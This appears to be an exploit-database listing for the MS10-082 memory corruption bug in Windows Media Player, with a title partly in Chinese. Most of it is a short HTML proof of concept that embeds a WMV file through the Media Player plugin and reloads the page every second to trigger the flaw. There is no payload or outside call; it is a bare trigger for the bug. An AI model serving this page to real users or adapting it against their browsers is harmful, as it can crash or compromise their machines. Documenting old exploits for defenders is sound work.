Exploit for Microsoft Windows Media Player重新加载操作内存破坏漏洞(MS10-082)
Exploit Code
## https://sploitus.com/exploit?id=SSV:20187
<html>
<body onload="setTimeout('location.reload()', 1000);">
<embed type="application/x-mplayer2" src="file.wmv"></embed>
</body>
</html>